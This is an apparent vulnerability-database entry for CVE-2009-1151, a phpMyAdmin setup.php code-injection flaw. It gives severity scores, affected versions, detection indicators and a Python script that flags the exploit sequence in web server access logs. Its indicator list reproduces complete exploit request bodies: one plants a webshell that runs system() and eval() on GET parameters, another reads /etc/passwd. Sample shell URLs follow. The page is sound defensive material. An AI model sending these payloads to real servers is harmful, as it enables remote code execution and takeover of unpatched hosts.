cbcvebase.
CVE-2009-1151
published 2009-03-26


Priority: P195 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · EXPLOIT · Initial access
CISA Known Exploited Vulnerability, due 2022-04-15
Exploited in the wild
EPSS: 95.44% (99.9th percentile)
Static code injection vulnerability in setup.php in phpMyAdmin 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 allows remote attackers to inject arbitrary PHP code into a configuration file via the save action.

Affected (9 ranges)

Vendor        Product        Version range                          Fixed in
debian        debian_linux
debian        debian_linux
debian        phpmyadmin     < phpmyadmin 4:3.1.3.1-1 (bookworm)    phpmyadmin 4:3.1.3.1-1 (bookworm)
phpmyadmin    phpmyadmin     >= 0, < 4:3.1.3.1-1                    4:3.1.3.1-1
phpmyadmin    phpmyadmin     >= 0, < 4:3.1.3.1-1                    4:3.1.3.1-1
phpmyadmin    phpmyadmin     >= 0, < 4:3.1.3.1-1                    4:3.1.3.1-1
phpmyadmin    phpmyadmin     >= 0, < 4:3.1.3.1-1                    4:3.1.3.1-1
phpmyadmin    phpmyadmin     >= 2.11.0, < 2.11.9.5                  2.11.9.5
phpmyadmin    phpmyadmin     >= 3.0.0, < 3.1.3.1                    3.1.3.1

Detection & IOCs (extracted from sources)

path: /scripts/setup.php
path: /config/config.inc.php
url: /scripts/setup.php
command: action=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22host%27]=%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix
command: action=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d=%27%27%3b%20if($_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3bsystem($_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}if($_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval($_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix
command: action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
url: /config/config.inc.php?c=id
url: /config/config.inc.php?c=ls+-l+/
filename: exploitcookie.txt
  • Detect follow-on webshell access via GET requests to /config/config.inc.php with query parameters 'c' (system command) or 'p' (eval payload), indicating successful exploitation and shell access.
  • Detect the presence of /config/config.inc.php being accessible (HTTP 200) alongside a token in /scripts/setup.php — the exploit checks both conditions before proceeding.
  • The Metasploit module targets URI /phpMyAdmin/scripts/setup.php and writes payload to /phpMyAdmin/config/config.inc.php; alert on creation or modification of config/config.inc.php under the phpMyAdmin web root.
  • The exploit grabs a 32-character CSRF token from /scripts/setup.php before injecting; a sequence of GET then POST to /scripts/setup.php from the same source IP is a strong behavioral indicator.
  • The injected webshell payload is written to config/config.inc.php, which is not the active configuration file; the attacker must separately request that file to execute code.
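The behavioural indicators listed above (GET-then-POST to /scripts/setup.php from one source, and follow-on requests to /config/config.inc.php carrying a c or p parameter) turned into a small access-log check. This is an added example, not code from the page or from phpMyAdmin; the log lines are constructed in Apache combined-log format and the IP addresses are documentation ranges.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx combined-log-format line (only the fields we need are captured).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample traffic, not real data: one source that follows the
# exploit sequence from the IOCs above, one benign source.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Apr/2022:12:00:01 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Apr/2022:12:00:02 +0000] "POST /phpMyAdmin/scripts/setup.php HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Apr/2022:12:00:03 +0000] "GET /phpMyAdmin/config/config.inc.php?c=id HTTP/1.1" 200 210',
    '198.51.100.7 - - [10/Apr/2022:12:05:00 +0000] "GET /phpMyAdmin/index.php HTTP/1.1" 200 8000',
    '198.51.100.7 - - [10/Apr/2022:12:05:01 +0000] "GET /phpMyAdmin/config/config.inc.php HTTP/1.1" 404 300',
]


def analyze(lines):
    """Return (ip, rule, uri) findings matching the CVE-2009-1151 indicators."""
    findings = []
    setup_get_ips = set()  # sources that fetched setup.php (token grab step)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-log line; skip rather than fail
        ip, method, uri, status = m.group("ip", "method", "uri", "status")
        parts = urlsplit(uri)
        path, qs = parts.path, parse_qs(parts.query)
        if path.endswith("/scripts/setup.php"):
            if method == "GET":
                setup_get_ips.add(ip)
            elif method == "POST" and ip in setup_get_ips:
                # POST body (action=save) is not in the access log, so the
                # GET-then-POST pairing from one IP is the observable signal.
                findings.append((ip, "setup.php GET-then-POST from same source", uri))
        elif path.endswith("/config/config.inc.php"):
            if "c" in qs or "p" in qs:
                findings.append((ip, "webshell-style request to config/config.inc.php", uri))
            elif status == "200":
                # Generated config reachable at all is worth a lower-severity alert.
                findings.append((ip, "config/config.inc.php served with HTTP 200", uri))
    return findings


if __name__ == "__main__":
    for ip, rule, uri in analyze(SAMPLE_LOG):
        print(f"{ip}\t{rule}\t{uri}")
```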

CVSS provenance

Source          Version  Score  Severity  Vector
nvd             v3.1     9.8    CRITICAL  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd             v2.0     7.5    HIGH      AV:N/AC:L/Au:N/C:P/I:P/A:P
osv                      9.8    CRITICAL
vulncheck                9.8    CRITICAL
cisa                     9.8    CRITICAL
vendor_debian            9.8    CRITICAL
vendor_redhat            9.8    CRITICAL